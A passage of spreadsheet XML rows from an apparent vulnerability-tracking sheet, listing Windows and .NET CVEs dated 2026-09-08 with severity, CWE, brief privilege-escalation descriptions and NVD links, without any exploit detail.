    <row r="3440">
      <c r="A3440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69605</t>
        </is>
      </c>
      <c r="C3440" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3440" s="5" t="inlineStr"/>
      <c r="F3440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3440" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3440" s="5" t="inlineStr"/>
      <c r="I3440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3440" s="5" t="inlineStr"/>
      <c r="K3440" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3440" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t>
        </is>
      </c>
    </row>
    <row r="3441">
      <c r="A3441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69606</t>
        </is>
      </c>
      <c r="C3441" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3441" s="5" t="inlineStr"/>
      <c r="F3441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3441" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3441" s="5" t="inlineStr"/>
      <c r="I3441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3441" s="5" t="inlineStr"/>
      <c r="K3441" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3441" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t>
        </is>
      </c>
    </row>
    <row r="3442">
      <c r="A3442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69610</t>
        </is>
      </c>
      <c r="C3442" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3442" s="5" t="inlineStr"/>
      <c r="F3442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3442" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3442" s="5" t="inlineStr"/>
      <c r="I3442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3442" s="5" t="inlineStr"/>
      <c r="K3442" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L3442" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t>
        </is>
      </c>
    </row>
    <row r="3443">
      <c r="A3443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69611</t>
        </is>
      </c>
      <c r="C3443" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3443" s="5" t="inlineStr"/>
      <c r="F3443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3443" s="5" t="inlineStr"/>
      <c r="H3443" s="5" t="inlineStr"/>
      <c r="I3443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3443" s="5" t="inlineStr"/>
      <c r="K3443" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3443" s="5" t="inlineStr">
        <is>
          <t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t>
        </is>
      </c>
    </row>
    <row r="3444">
      <c r="A3444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69613</t>
        </is>
      </c>
      <c r="C3444" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3444" s="5" t="inlineStr"/>
      <c r="F3444" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3444" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3444" s="5" t="inlineStr"/>
      <c r="I3444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3444" s="5" t="inlineStr"/>
      <c r="K3444" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3444" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t>
        </is>
      </c>
    </row>
    <row r="3445">
      <c r="A3445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69617</t>
        </is>
      </c>
      <c r="C3445" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3445" s="5" t="inlineStr"/>
      <c r="F3445" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3445" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3445" s="5" t="inlineStr"/>
      <c r="I3445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3445" s="5" t="inlineStr"/>
      <c r="K3445" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3445" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t>
        </is>
      </c>
    </row>
    <row r="3446">
      <c r="A3446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69621</t>
        </is>
      </c>
      <c r="C3446" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3446" s="5" t="inlineStr"/>
      <c r="F3446" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3446" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3446" s="5" t="inlineStr"/>
      <c r="I3446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3446" s="5" t="inlineStr"/>
      <c r="K3446" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3446" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t>
        </is>
      </c>
    </row>
    <row r="3447">
      <c r="A3447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69630</t>
        </is>
      </c>
      <c r="C3447" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3447" s="5" t="inlineStr"/>
      <c r="F3447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3447" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3447" s="5" t="inlineStr"/>
      <c r="I3447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3447" s="5" t="inlineStr"/>
      <c r="K3447" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3447" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t>
        </is>
      </c>
    </row>
    <row r="3448">
      <c r="A3448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69645</t>
        </is>
      </c>
      <c r="C3448" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3448" s="5" t="inlineStr"/>
      <c r="F3448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3448" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3448" s="5" t="inlineStr"/>
      <c r="I3448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3448" s="5" t="inlineStr"/>
      <c r="K3448" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3448" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t>
        </is>
      </c>
    </row>
    <row r="3449">
      <c r="A3449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69648</t>
        </is>
      </c>
      <c r="C3449" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3449" s="5" t="inlineStr"/>
      <c r="F3449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3449" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3449" s="5" t="inlineStr"/>
      <c r="I3449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3449" s="5" t="inlineStr"/>
      <c r="K3449" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3449" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t>
        </is>
      </c>
    </row>
    <row r="3450">
      <c r="A3450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69652</t>
        </is>
      </c>
      <c r="C3450" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3450" s="5" t="inlineStr"/>
      <c r="F3450" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3450" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3450" s="5" t="inlineStr"/>
      <c r="I3450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3450" s="5" t="inlineStr"/>
      <c r="K3450" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3450" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t>
        </is>
      </c>
    </row>
    <row r="3451">
      <c r="A3451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69654</t>
        </is>
      </c>
      <c r="C3451" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3451" s="5" t="inlineStr"/>
      <c r="F3451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3451" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3451" s="5" t="inlineStr"/>
      <c r="I3451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3451" s="5" t="inlineStr"/>
      <c r="K3451" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3451" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t>
        </is>
      </c>
    </row>
    <row r="3452">
      <c r="A3452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69682</t>
        </is>
      </c>
      <c r="C3452" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3452" s="5" t="inlineStr"/>
      <c r="F3452" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3452" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3452" s="5" t="inlineStr"/>
      <c r="I3452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3452" s="5" t="inlineStr"/>
      <c r="K3452" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3452" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t>
        </is>
      </c>
    </row>
    <row r="3453">
      <c r="A3453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69692</t>
        </is>
      </c>
      <c r="C3453" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3453" s="5" t="inlineStr"/>
      <c r="F3453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3453" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3453" s="5" t="inlineStr"/>
      <c r="I3453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3453" s="5" t="inlineStr"/>
      <c r="K3453" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3453" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t>
        </is>
      </c>
    </row>
    <row r="3454">
      <c r="A3454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69693</t>
        </is>
      </c>
      <c r="C3454" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3454" s="5" t="inlineStr"/>
      <c r="F3454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3454" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3454" s="5" t="inlineStr"/>
      <c r="I3454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3454" s="5" t="inlineStr"/>
      <c r="K3454" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3454" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t>
        </is>
      </c>
    </row>
    <row r="3455">
      <c r="A3455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69694</t>
        </is>
      </c>
      <c r="C3455" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3455" s="5" t="inlineStr"/>
      <c r="F3455" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G3455" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3455" s="5" t="inlineStr"/>
      <c r="I3455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3455" s="5" t="inlineStr"/>
      <c r="K3455" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L3455" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t>
        </is>
      </c>
    </row>
    <row r="3456">
      <c r="A3456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69708</t>
        </is>
      </c>
      <c r="C3456" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3456" s="5" t="inlineStr"/>
      <c r="F3456" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3456" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3456" s="5" t="inlineStr"/>
      <c r="I3456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3456" s="5" t="inlineStr"/>
      <c r="K3456" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3456" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t>
        </is>
      </c>
    </row>
    <row r="3457">
      <c r="A3457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69711</t>
        </is>
      </c>
      <c r="C3457" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3457" s="5" t="inlineStr"/>
      <c r="F3457" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3457" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3457" s="5" t="inlineStr"/>
      <c r="I3457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3457" s="5" t="inlineStr"/>
      <c r="K3457" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3457" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t>
        </is>
      </c>
    </row>
    <row r="3458">
      <c r="A3458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69735</t>
        </is>
      </c>
      <c r="C3458" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3458" s="5" t="inlineStr"/>
      <c r="F3458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3458" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3458" s="5" t="inlineStr"/>
      <c r="I3458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3458" s="5" t="inlineStr"/>
      <c r="K3458" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3458" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t>
        </is>
      </c>
    </row>
    <row r="3459">
      <c r="A3459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69779</t>
        </is>
      </c>
      <c r="C3459" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3459" s="5" t="inlineStr"/>
      <c r="F3459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3459" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3459" s="5" t="inlineStr"/>
      <c r="I3459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3459" s="5" t="inlineStr"/>
      <c r="K3459" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3459" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t>
        </is>
      </c>
    </row>
    <row r="3460">
      <c r="A3460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69791</t>
        </is>
      </c>
      <c r="C3460" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3460" s="5" t="inlineStr"/>
      <c r="F3460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3460" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3460" s="5" t="inlineStr"/>
      <c r="I3460" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3460" s="5" t="inlineStr"/>
      <c r="K3460" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3460" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t>
        </is>
      </c>
    </row>
    <row r="3461">
      <c r="A3461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69806</t>
        </is>
      </c>
      <c r="C3461" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3461" s="5" t="inlineStr"/>
      <c r="F3461" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G3461" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H3461" s="5" t="inlineStr"/>
      <c r="I3461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3461" s="5" t="inlineStr"/>
      <c r="K3461" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="L3461" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t>
        </is>
      </c>
    </row>
    <row r="3462">
      <c r="A3462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="C3462" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3462" s="5" t="inlineStr"/>
      <c r="F3462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3462" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3462" s="5" t="inlineStr"/>
      <c r="I3462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3462" s="5" t="inlineStr"/>
      <c r="K3462" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3462" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="3463">
      <c r="A3463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="C3463" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3463" s="5" t="inlineStr"/>
      <c r="F3463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3463" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3463" s="5" t="inlineStr"/>
      <c r="I3463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3463" s="5" t="inlineStr"/>
      <c r="K3463" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3463" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="3464">
      <c r="A3464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="C3464" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3464" s="5" t="inlineStr"/>
      <c r="F3464" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3464" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3464" s="5" t="inlineStr"/>
      <c r="I3464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3464" s="5" t="inlineStr"/>
      <c r="K3464" s="5" t="inlineStr">
        <is>
